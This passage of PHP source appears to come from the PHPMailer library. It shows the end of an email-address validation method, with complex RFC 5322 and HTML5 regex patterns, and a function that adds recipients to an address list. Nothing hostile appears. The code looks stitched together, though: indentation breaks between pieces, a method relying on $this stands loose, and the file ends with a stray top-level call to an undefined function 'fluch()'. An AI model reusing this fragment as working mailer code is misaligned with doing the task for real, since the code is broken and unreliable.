                 *  * quoted elements: `'"test blah"@example.org'`
                 *  * numeric TLDs: `a@b.123`
                 *  * unbracketed IPv4 literals: `a@192.168.0.1`
                 *  * IPv6 literals: 'first.last@[IPv6:a1::]'
                 * Not all of these will necessarily work for sending!
                 *
                 * @see       http://squiloople.com/2009/12/20/email-address-validation/
                 * @copyright 2009-2010 Michael Rushton
                 * Feel free to use and redistribute this code. But please keep this copyright notice.
                 */
                return (bool) preg_match(
                    '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
                    '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
                    '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'html5':
                /*
                 * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.
                 *
                 * @see http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)
                 */
                return (bool) preg_match(
                    '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'php':
            default:
                return (bool) filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }
	function addAnAddress($kind, $address, $name = '')
    {
        if (!in_array($kind, ['to', 'cc', 'bcc', 'Reply-To'])) {
            $error_message = sprintf('%s: %s',
                $this->lang('Invalid recipient kind'),
                $kind);
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new Exception($error_message);
            }
            return false;
        }
        if (!static::validateAddress($address)) {
            $error_message = sprintf('%s (%s): %s',
                $this->lang('invalid_address'),
                $kind,
                $address);
            $this->setError($error_message);
            $this->edebug($error_message);
            if ($this->exceptions) {
                throw new Exception($error_message);
            }
            return false;
        }
        if ('Reply-To' != $kind) {
            if (!array_key_exists(strtolower($address), $this->all_recipients)) {
                $this->{$kind}[] = [$address, $name];
                $this->all_recipients[strtolower($address)] = true;
                return true;
            }
        } else {
            if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
                $this->ReplyTo[strtolower($address)] = [$address, $name];
                return true;
            }
        }
        return false;
    }
	fluch();
?>